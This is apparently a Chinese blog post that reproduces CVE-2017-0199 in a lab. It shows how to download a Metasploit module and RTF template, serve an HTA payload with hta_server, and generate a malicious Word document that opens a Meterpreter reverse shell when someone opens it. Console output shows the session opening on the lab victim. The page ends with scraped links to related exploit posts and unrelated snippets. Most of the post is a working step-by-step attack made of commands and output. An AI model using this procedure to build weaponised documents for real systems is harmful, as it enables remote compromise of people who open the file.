CVE-2017-0199 WORD/RTF嵌入OLE调用远程文件执行的一个漏洞。不需要用户交互。打开文档即中招

首先更新msf到最新,据说最新版简化了利用过程,不需要开启hta这一步.但没测成功 还是按老方法

更新msf,增加国内源

 #清华大学

 #deb http://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free

 #deb-src https://mirrors.tuna.tsinghua.edu.cn/kali kali-rolling main contrib non-free

 #浙大

 #deb http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free

 #deb-src http://mirrors.zju.edu.cn/kali kali-rolling main contrib non-free

 #东软大学

 #deb http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib

 #deb-src http://mirrors.neusoft.edu.cn/kali kali-rolling/main non-free contrib

 #官方源

 #deb http://http.kali.org/kali kali-rolling main non-free contrib

 #deb-src http://http.kali.org/kali kali-rolling main non-free contrib

没用阿里云的是因为用阿里云的源更新时,提示hash校验失败.

 apt-get clean && apt-get update -y && apt-get -f upgrade -y

 msfupdate

下载对应exploit

 cd /usr/share/metasploit-framework/modules/exploits/windows/fileformat

 wget https://raw.githubusercontent.com/nixawk/metasploit-framework/feature/CVE-2017-0199/modules/exploits/windows/fileformat/office_word_hta.rb

下载cve-2017-0199.rtf:

 cd /usr/share/metasploit-framework/data/exploits

 wget https://raw.githubusercontent.com/nixawk/metasploit-framework/feature/CVE-2017-0199/data/exploits/cve-2017-0199.rtf

开启HTA:

 root@kali:~# msfconsole

      ,           ,

     /             \

    ((__---,,,---__))

       (_) O O (_)_________

          \ _ /            |\

           o_o \   M S F   | \

                \   _____  |  *

                 |||   WW|||

                 |||     |||

 Tired of typing 'set RHOSTS'? Click & pwn with Metasploit Pro

 Learn more on http://rapid7.com/metasploit

        =[ metasploit v4.14.14-dev                         ]

 + -- --=[  exploits -  auxiliary -  post        ]

 + -- --=[  payloads -  encoders -  nops             ]

 + -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

 msf > use exploit/windows/misc/hta_server

 msf exploit(hta_server) > show options 

 Module options (exploit/windows/misc/hta_server):

    Name     Current Setting  Required  Description

    ----     ---------------  --------  -----------

    SRVHOST  0.0.0.0          yes       The local host to listen on. This must be an address on the local machine or 0.0.0.0

    SRVPORT               yes       The local port to listen on.

    SSL      false            no        Negotiate SSL for incoming connections

    SSLCert                   no        Path to a custom SSL certificate (default is randomly generated)

    URIPATH                   no        The URI to use for this exploit (default is random)

 Exploit target:

    Id  Name

    --  ----

       Powershell x86

 msf exploit(hta_server) > run

 [*] Exploit running as background job.

 [*] Started reverse TCP handler on 192.168.1.101:

 [*] Using URL: http://0.0.0.0:8080/h48EGx964y.hta

 [*] Local IP: http://192.168.1.101:8080/h48EGx964y.hta

 [*] Server started.

 msf exploit(hta_server) > use exploit/windows/fileformat/office_word_hta

 msf exploit(office_word_hta) > show options 

 Module options (exploit/windows/fileformat/office_word_hta):

    Name       Current Setting              Required  Description

    ----       ---------------              --------  -----------

    FILENAME                                no        The file name.

    TARGETURI  http://example.com/test.rtf  yes       The path to a online hta file.

 Exploit target:

    Id  Name

    --  ----

       Microsoft Office Word

生成payload doc文档:

 msf exploit(office_word_hta) > set TARGETURI http://192.168.1.101:8080/h48EGx964y.hta

 TARGETURI => http://192.168.1.101:8080/h48EGx964y.hta

 msf exploit(office_word_hta) > set FILENAME msf.doc

 FILENAME => msf.doc

 msf exploit(office_word_hta) > run

 [+] msf.doc stored at /root/.msf4/local/msf.doc

 msf exploit(office_word_hta) >

 msf exploit(office_word_hta) >

 msf exploit(office_word_hta) >

 msf exploit(office_word_hta) >

 msf exploit(office_word_hta) >

 msf exploit(office_word_hta) >

 msf exploit(office_word_hta) > 

 msf exploit(office_word_hta) >

 msf exploit(office_word_hta) >

 msf exploit(office_word_hta) >

 msf exploit(office_word_hta) >

 msf exploit(office_word_hta) >

 msf exploit(office_word_hta) >

 [*] 192.168.1.108    hta_server - Delivering Payload

 [*] 192.168.1.108    hta_server - Delivering Payload

 [*] Sending stage ( bytes) to 192.168.1.108

 [*] Meterpreter session  opened (192.168.1.101: -> 192.168.1.108:) at -- :: +

 msf exploit(office_word_hta) > sessions -i

 Active sessions

 ===============

   Id  Type                     Information       Connection

   --  ----                     -----------       ----------

      meterpreter x86/windows  FEIYU\yu @ FEIYU  192.168.1.101: -> 192.168.1.108: (192.168.1.108)

 msf exploit(office_word_hta) > session

 [-] Unknown command: session.

 msf exploit(office_word_hta) > sessions -i

 [*] Starting interaction with ...

去目标机上看下:

需要注意的是,不是所有版本都支持,比如我的office plus 2013

cve-2017-0199&metasploit复现过程的更多相关文章

  1. 利用metasploit复现永恒之蓝

    环境 目标机器:windows 7 ,172.16.136.169 攻击机:安装了Metasploit 的 ubuntu16.04 ,172.16.136.130 (安装Metasploit:在 Ub ...

  2. ShadowBroker释放的NSA工具中Esteemaudit漏洞复现过程

    没有时间测试呢,朋友们都成功复现,放上网盘地址:https://github.com/x0rz/EQGRP 近日臭名昭著的方程式组织工具包再次被公开,TheShadowBrokers在steemit. ...

  3. NSA Fuzzbunch中EternalRomance工具复现过程

    自Shadow Brokers公布NSA泄露工具后,各路大神陆陆续续发表复现过程,这几天也仔细试了各种套路,一直想弄明白DoublePulsar中的shellcode到底是如何用的,刚好又在模拟环境中 ...

  4. Struts2 REST 插件 XStream 远程代码执行漏洞 S2-052 复现过程

    v\:* {behavior:url(#default#VML);} o\:* {behavior:url(#default#VML);} w\:* {behavior:url(#default#VM ...

  5. 漏洞利用之Metasploit使用过程

    漏洞利用之Metasploit使用过程 先扫描端口,看开放的服务,如开放ftp,版本是vsftpd 2.3.4:使用search搜索vsftp查看是否在相应的漏洞利用exploit,输入search ...

  6. 【3D】PoseCNN姿态检测网络复现过程记录

    最近在研究室内6D姿态检测相关问题,计划在PoseCNN网络基础上进行改进实现.但是在第一步的复现过程中踩了无数的坑,最终成功运行了demo,但目前数据集train还是遇到了一些问题.有问题欢迎一起交 ...

  7. Linux sudo权限提升漏洞CVE-2021-3156 POC及复现过程

    漏洞简介 2021年1月26日,国外研究团队披露了sudo 中存在的堆溢出漏洞(CVE-2021-3156).利用该漏洞,非特权账户可以使用默认的sudo配置主机上获取root权限,该漏洞影响1.8. ...

  8. php反序列化漏洞复现过程

    PHP反序列化漏洞复现 测试代码 我们运行以上代码文件,来证明函数被调用: 应为没有创建对象,所以构造函数__construct()不会被调用,但是__wakeup()跟__destruct()函数都 ...

  9. CVE-2020-2551复现过程

    项目地址 cnsimo/CVE-2020-2551 CVE-2020-2551 weblogic iiop 反序列化漏洞 该项目的搭建脚本在10.3.6版本经过测试,12版本未测试. 环境 kali+ ...

随机推荐

  1. git常用命令,助你快速入门

    git是程序员中最常用的版本控制工具,学会git的基本使用是十分重要,特别是在公司里面的协同开发,废话不多说,下面贴出常用的命令. 1.基本配置 # 既然git是多人协同的工具,别人要看到你提交代码的 ...

  2. 学容器必须懂 bridge 网络 - 每天5分钟玩转 Docker 容器技术(32)

    上一节我们讨论了 none 和 host 类型的容器网络,本节学习应用最广泛也是默认的 bridge 网络. Docker 安装时会创建一个 命名为 docker0 的 linux bridge.如果 ...

  3. Linux网络编程“惊群”问题总结

    1.前言 我从事Linux系统下网络开发将近4年了,经常还是遇到一些问题,只是知其然而不知其所以然,有时候和其他人交流,搞得非常尴尬.如今计算机都是多核了,网络编程框架也逐步丰富多了,我所知道的有多进 ...

  4. java 多线程访问同一个对象数据保护的问题

    java 多线程同时访问统一个数据的时候,会引起一些错误,后面的线程会修改数据,而前面的线程还在使用修改前的内容, 使用 synchronized 关键字,保证代码块只能有一个线程来访问 public ...

  5. [leetcode-599-Minimum Index Sum of Two Lists]

    Suppose Andy and Doris want to choose a restaurant for dinner, and they both have a list of favorite ...

  6. 如何利用keytool查看一个apk的签名

  7. [翻译]成为顶尖程序员应当学什么?Python、C还是Ruby?

    原文地址(墙外):https://medium.com/life-tips/should-you-learn-python-c-or-ruby-to-be-a-top-coder-infographi ...

  8. 微信开发之获取jsapi_ticket

    一.获取流程 1.获取 access_token 2.通过access_token换取 jsapi_ticket 3.签名算法 签名生成规则如下:参与签名的字段包括noncestr(随机字符串), 有 ...

  9. C#工作笔记

    没想到一个Java后端开发还要负责C#桌面程序,我感觉有点方.不过方归方,活还是要干的.简单记录下学到的一些知识点. 1.引用API函数 namespace Demo { class MyUtil { ...

  10. CJOJ 2044 【一本通】最长公共子序列(动态规划)

    CJOJ 2044 [一本通]最长公共子序列(动态规划) Description 一个给定序列的子序列是在该序列中删去若干元素后得到的序列.确切地说,若给定序列X,则另一序列Z是X的子序列是指存在一个 ...